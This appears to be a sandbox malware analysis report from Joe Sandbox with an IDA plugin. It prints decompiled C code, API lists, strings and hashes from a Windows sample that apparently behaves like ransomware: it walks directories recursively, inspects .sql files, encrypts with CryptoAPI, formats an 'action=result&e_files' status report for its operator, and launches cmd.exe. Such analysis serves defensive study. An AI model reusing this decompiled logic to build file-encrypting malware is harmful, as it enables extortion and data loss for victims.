                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
                                      • lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
                                      • VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
                                      • lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
                                      • HeapFree.KERNEL32(00000000), ref: 0040522F
                                      • HeapFree.KERNEL32(00000000), ref: 00405240
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
                                      • GetLastError.KERNEL32 ref: 0040525E
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                        • Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                        • Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
                                        • Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                        • Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
                                      • String ID: #shasj$T@
                                      • API String ID: 463976167-3786297935
                                      • Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
                                      • Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004064A0(WCHAR* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				long _v24;
                                      				struct _WIN32_FIND_DATAW _v620;
                                      				int _t38;
                                      				struct _SECURITY_ATTRIBUTES* _t40;
                                      				int _t50;
                                      				WCHAR* _t52;
                                      				intOrPtr _t53;
                                      				void* _t54;
                                      				WCHAR* _t57;
                                      				long _t64;
                                      				WCHAR* _t66;
                                      				void* _t67;
                                      
                                      				_t66 = __ecx;
                                      				_v16 = __ecx;
                                      				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                      				_v20 = _t52;
                                      				lstrcatW(_t66, "*");
                                      				_v8 = FindFirstFileW(_t66,  &_v620);
                                      				 *_t52 = 0;
                                      				_t53 = 0;
                                      				do {
                                      					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                      						goto L20;
                                      					} else {
                                      						lstrcatW(_t66,  &(_v620.cFileName));
                                      						_t38 = lstrlenW(_t66);
                                      						_t10 = _t38 - 1; // -1
                                      						_t57 =  &(_t66[_t10]);
                                      						if(_t38 == 0) {
                                      							L18:
                                      							_t53 = 0;
                                      							goto L19;
                                      						} else {
                                      							while( *_t57 != 0x2e) {
                                      								_t57 = _t57 - 2;
                                      								_t38 = _t38 - 1;
                                      								if(_t38 != 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							if(_t38 == 0) {
                                      								goto L18;
                                      							} else {
                                      								_t40 = lstrcmpW(_t57, L".sql");
                                      								if(_t40 != 0) {
                                      									goto L18;
                                      								} else {
                                      									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                      									_t64 = GetFileSize(_t54, 0);
                                      									_v12 = 0;
                                      									if(_t64 < 0x40000000) {
                                      										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                      										if(_t67 != 0) {
                                      											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
                                      												_t50 = lstrlenA("*******************");
                                      												_t15 = _t67 + 1; // 0x1
                                      												_v12 = E00406440(_t15 + _t50);
                                      											}
                                      											VirtualFree(_t67, 0, 0x8000);
                                      										}
                                      										_t66 = _v16;
                                      									}
                                      									CloseHandle(_t54);
                                      									_t53 = _v12;
                                      									if(_t53 == 0) {
                                      										L19:
                                      										 *_v20 = 0;
                                      										goto L20;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					break;
                                      					L20:
                                      				} while (FindNextFileW(_v8,  &_v620) != 0);
                                      				FindClose(_v8);
                                      				return _t53;
                                      			}



















                                      0x004064ab
                                      0x004064af
                                      0x004064be
                                      0x004064c1
                                      0x004064c4
                                      0x004064de
                                      0x004064e3
                                      0x004064e6
                                      0x004064f0
                                      0x00406500
                                      0x00000000
                                      0x0040651c
                                      0x00406524
                                      0x0040652b
                                      0x00406531
                                      0x00406534
                                      0x00406539
                                      0x00406608
                                      0x00406608
                                      0x00000000
                                      0x00406540
                                      0x00406540
                                      0x00406546
                                      0x00406549
                                      0x0040654a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040654a
                                      0x0040654e
                                      0x00000000
                                      0x00406554
                                      0x0040655a
                                      0x0040655e
                                      0x00000000
                                      0x00406564
                                      0x00406577
                                      0x00406582
                                      0x00406586
                                      0x0040658f
                                      0x004065a0
                                      0x004065a4
                                      0x004065b7
                                      0x004065ce
                                      0x004065d4
                                      0x004065de
                                      0x004065de
                                      0x004065e9
                                      0x004065e9
                                      0x004065ef
                                      0x004065ef
                                      0x004065f3
                                      0x004065f9
                                      0x004065fe
                                      0x0040660a
                                      0x0040660f
                                      0x00000000
                                      0x0040660f
                                      0x004065fe
                                      0x0040655e
                                      0x0040654e
                                      0x00406539
                                      0x00000000
                                      0x00406612
                                      0x00406622
                                      0x0040662d
                                      0x0040663b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                      • lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                      • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                      • lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
                                      • FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
                                      • FindClose.KERNEL32(?,?,?), ref: 0040662D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                      • String ID: *******************$.sql
                                      • API String ID: 3616287438-58436570
                                      • Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
                                      • Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				BYTE* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				int _v20;
                                      				char _v22;
                                      				short _v24;
                                      				short _v28;
                                      				char _v36;
                                      				char _v180;
                                      				char _v435;
                                      				char _v436;
                                      				WCHAR* _t40;
                                      				signed int _t48;
                                      				int _t60;
                                      				void* _t61;
                                      				char _t68;
                                      				CHAR* _t71;
                                      				void* _t74;
                                      				short _t79;
                                      				short _t80;
                                      				char _t81;
                                      				BYTE* _t84;
                                      				WCHAR* _t92;
                                      				signed int _t93;
                                      				char* _t95;
                                      				void* _t96;
                                      				int _t98;
                                      				long _t99;
                                      				void* _t100;
                                      
                                      				_t74 = __ecx;
                                      				_t96 = __edx;
                                      				_v12 = __ecx;
                                      				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                      				_v16 = _t40;
                                      				if(_t40 == 0) {
                                      					_t92 = 0;
                                      					_t71 = 0;
                                      				} else {
                                      					_t3 =  &(_t40[0x400]); // 0x800
                                      					_t71 = _t3;
                                      					_t92 = _t40;
                                      				}
                                      				_push(_t96);
                                      				_v8 = _t92;
                                      				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				E004039B0( &_v180);
                                      				E00406D90( &_v180);
                                      				E00406BA0( &_v180);
                                      				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
                                      				_t48 = lstrlenW(_t92);
                                      				_t79 = "#shasj"; // 0x61687323
                                      				_t93 = _t48;
                                      				asm("movq xmm0, [0x410128]");
                                      				_v28 = _t79;
                                      				_t80 =  *0x410134; // 0x6a73
                                      				_v24 = _t80;
                                      				_t81 =  *0x410136; // 0x0
                                      				asm("movq [ebp-0x20], xmm0");
                                      				_v22 = _t81;
                                      				_v436 = 0;
                                      				E00408B30( &_v435, 0, 0xff);
                                      				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
                                      				_t98 = _t93 + _t93;
                                      				E00405CF0( &_v436, _v8, _t98);
                                      				_v20 = _t93 * 8;
                                      				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
                                      					GetLastError();
                                      				}
                                      				_t29 = lstrlenA(_t71) + 4; // 0x4
                                      				_t99 = _t29;
                                      				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                      				_t60 = lstrlenA(_t71);
                                      				_t84 = _v12;
                                      				_t61 = _t60 + 2;
                                      				if(_t84 == 0) {
                                      					L7:
                                      					_v8 = 0;
                                      				} else {
                                      					_v8 = _t84;
                                      					if(_t61 >= _t99) {
                                      						goto L7;
                                      					}
                                      				}
                                      				_t100 = 0;
                                      				if(lstrlenA(_t71) != 0) {
                                      					_t95 = _v8;
                                      					do {
                                      						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                      						if(_t68 != 0xa && _t68 != 0xd) {
                                      							 *_t95 = _t68;
                                      							_t95 = _t95 + 1;
                                      						}
                                      						_t100 = _t100 + 1;
                                      					} while (_t100 < lstrlenA(_t71));
                                      				}
                                      				E00405370(_v8, 0, 0);
                                      				_t73 =  !=  ? 1 : 0;
                                      				VirtualFree(_v12, 0, 0x8000);
                                      				E00407720( &_v180);
                                      				VirtualFree(_v16, 0, 0x8000);
                                      				_t67 =  !=  ? 1 : 0;
                                      				return  !=  ? 1 : 0;
                                      			}
































                                      0x00405540
                                      0x0040555a
                                      0x0040555c
                                      0x0040555f
                                      0x00405565
                                      0x0040556a
                                      0x00405576
                                      0x00405578
                                      0x0040556c
                                      0x0040556c
                                      0x0040556c
                                      0x00405572
                                      0x00405572
                                      0x0040557a
                                      0x0040557e
                                      0x0040558d
                                      0x00405596
                                      0x00405598
                                      0x00405599
                                      0x0040559e
                                      0x004055a0
                                      0x004055a1
                                      0x004055a3
                                      0x004055a4
                                      0x004055a6
                                      0x004055a7
                                      0x004055a9
                                      0x004055aa
                                      0x004055af
                                      0x004055b1
                                      0x004055b2
                                      0x004055ba
                                      0x004055c5
                                      0x004055d0
                                      0x004055e8
                                      0x004055ee
                                      0x004055f0
                                      0x004055f6
                                      0x004055f8
                                      0x00405606
                                      0x00405609
                                      0x00405615
                                      0x00405619
                                      0x00405622
                                      0x00405627
                                      0x0040562a
                                      0x00405631
                                      0x0040564d
                                      0x00405655
                                      0x00405662
                                      0x00405671
                                      0x0040568a
                                      0x0040568c
                                      0x0040568c
                                      0x004056a2
                                      0x004056a2
                                      0x004056af
                                      0x004056b2
                                      0x004056b4
                                      0x004056b7
                                      0x004056bc
                                      0x004056c5
                                      0x004056c5
                                      0x004056be
                                      0x004056be
                                      0x004056c3
                                      0x00000000
                                      0x00000000
                                      0x004056c3
                                      0x004056cd
                                      0x004056d3
                                      0x004056d5
                                      0x004056d8
                                      0x004056d8
                                      0x004056dd
                                      0x004056e3
                                      0x004056e5
                                      0x004056e5
                                      0x004056e7
                                      0x004056ee
                                      0x004056d8
                                      0x004056f9
                                      0x00405713
                                      0x00405720
                                      0x00405728
                                      0x00405737
                                      0x0040573b
                                      0x00405741

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
                                      • wsprintfW.USER32 ref: 0040558D
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
                                      • _memset.LIBCMT ref: 00405631
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
                                      • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737
                                      Strings
                                      • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587
                                      • #shasj, xrefs: 004055F0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                      • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                      • API String ID: 2994799111-4131875188
                                      • Opcode ID: 51a0efbfb0500c96f4d42aacda74baac6df24cd220e5eca8f45d8e73b1e17734
                                      • Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
                                      • Opcode Fuzzy Hash: 51a0efbfb0500c96f4d42aacda74baac6df24cd220e5eca8f45d8e73b1e17734
                                      • Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				char _v20;
                                      				long _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				long** _t26;
                                      				char* _t31;
                                      				int _t33;
                                      				long _t36;
                                      
                                      				EnterCriticalSection(0x412ae8);
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t26 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                      				if(_t26 != 0) {
                                      					L6:
                                      					_v16 = 0;
                                      					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                      						_v20 = 0xa;
                                      						_t31 =  &_v20;
                                      						_t12 =  &_v28; // 0x403724
                                      						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
                                      						_v32 = _t31;
                                      						 *_a16 = 0xc8;
                                      						_t16 =  &_a20; // 0x403724
                                      						_t33 = _a12;
                                      						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
                                      						_v16 = _t33;
                                      						_v24 = GetLastError();
                                      						if(_v16 == 0) {
                                      							E004034F0(_t34);
                                      						}
                                      					}
                                      					CryptReleaseContext(_v8, 0);
                                      					LeaveCriticalSection(0x412ae8);
                                      					return _v16;
                                      				}
                                      				_t36 = GetLastError();
                                      				if(_t36 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      				if(_t36 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}














                                      0x0040600b
                                      0x00406011
                                      0x00406018
                                      0x0040602a
                                      0x0040602e
                                      0x00406036
                                      0x0040606e
                                      0x0040606e
                                      0x00406091
                                      0x00406093
                                      0x0040609c
                                      0x004060a0
                                      0x004060aa
                                      0x004060b0
                                      0x004060b6
                                      0x004060bc
                                      0x004060c4
                                      0x004060d2
                                      0x004060d8
                                      0x004060e1
                                      0x004060e8
                                      0x004060ed
                                      0x004060ed
                                      0x004060e8
                                      0x004060f8
                                      0x00406103
                                      0x00000000
                                      0x00406109
                                      0x00406038
                                      0x00406043
                                      0x00000000
                                      0x00406067
                                      0x00406054
                                      0x0040605c
                                      0x00000000
                                      0x00406065
                                      0x00000000

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                      • GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                      • CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                      • GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                      • LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                      • String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 72144047-2376705498
                                      • Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
                                      • Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                      				void* _v12;
                                      				intOrPtr _v16;
                                      				WCHAR* _v20;
                                      				intOrPtr _v24;
                                      				struct _WIN32_FIND_DATAW _v616;
                                      				void* _t35;
                                      				signed int _t37;
                                      				int _t39;
                                      				signed int _t42;
                                      				void* _t46;
                                      				signed int* _t48;
                                      				WCHAR* _t53;
                                      				intOrPtr* _t54;
                                      				short _t57;
                                      				WCHAR* _t63;
                                      				void* _t67;
                                      
                                      				_v24 = __edx;
                                      				_t63 = __ecx;
                                      				"SVWj@h"();
                                      				if(__eax == 0 || E004064A0(__ecx) != 0) {
                                      					L17:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					E00406640(__ecx);
                                      					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                      					_v20 = _t53;
                                      					lstrcatW(_t63, "*");
                                      					_t35 = FindFirstFileW(_t63,  &_v616);
                                      					_t57 = 0;
                                      					_v12 = _t35;
                                      					 *_t53 = 0;
                                      					if(_t35 != 0xffffffff) {
                                      						_t54 = _a12;
                                      						do {
                                      							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                      							__eflags = _t37;
                                      							if(_t37 != 0) {
                                      								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                      								__eflags = _t42;
                                      								if(_t42 != 0) {
                                      									lstrcatW(_t63,  &(_v616.cFileName));
                                      									__eflags = _v616.dwFileAttributes & 0x00000010;
                                      									if((_v616.dwFileAttributes & 0x00000010) == 0) {
                                      										_v16 =  *_t54;
                                      										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
                                      										_t67 = _t67 + 8;
                                      										 *_t54 =  *_t54 + _t46;
                                      										asm("adc [ebx+0x4], edx");
                                      										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                      										if(__eflags <= 0) {
                                      											if(__eflags < 0) {
                                      												L12:
                                      												_t48 = _a8;
                                      												 *_t48 =  *_t48 + 1;
                                      												__eflags =  *_t48;
                                      											} else {
                                      												__eflags = _v16 -  *_t54;
                                      												if(_v16 <  *_t54) {
                                      													goto L12;
                                      												}
                                      											}
                                      										}
                                      									} else {
                                      										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                      										_t67 = _t67 + 0xc;
                                      									}
                                      									_t57 = 0;
                                      									__eflags = 0;
                                      									 *_v20 = 0;
                                      								}
                                      							}
                                      							_t39 = FindNextFileW(_v12,  &_v616);
                                      							__eflags = _t39;
                                      						} while (_t39 != 0);
                                      						FindClose(_v12);
                                      						goto L17;
                                      					} else {
                                      						return 0xdeadbeaf;
                                      					}
                                      				}
                                      			}



















                                      0x004066fc
                                      0x004066ff
                                      0x00406701
                                      0x00406708
                                      0x00406836
                                      0x00406836
                                      0x0040683c
                                      0x0040671d
                                      0x0040671d
                                      0x00406735
                                      0x00406738
                                      0x0040673b
                                      0x00406745
                                      0x0040674b
                                      0x0040674d
                                      0x00406750
                                      0x00406756
                                      0x00406764
                                      0x00406770
                                      0x0040677c
                                      0x00406782
                                      0x00406784
                                      0x00406796
                                      0x0040679c
                                      0x0040679e
                                      0x004067a8
                                      0x004067aa
                                      0x004067b1
                                      0x004067e2
                                      0x004067e5
                                      0x004067ea
                                      0x004067ed
                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x004067cc
                                      0x0040680e
                                      0x0040680e
                                      0x00406810
                                      0x00406810
                                      0x0040679e
                                      0x0040681d
                                      0x00406823
                                      0x00406823
                                      0x0040682e
                                      0x00000000
                                      0x00406758
                                      0x00406763
                                      0x00406763
                                      0x00406756

                                      APIs
                                        • Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                        • Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                        • Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                        • Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                        • Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                        • Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                        • Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                        • Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                        • Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
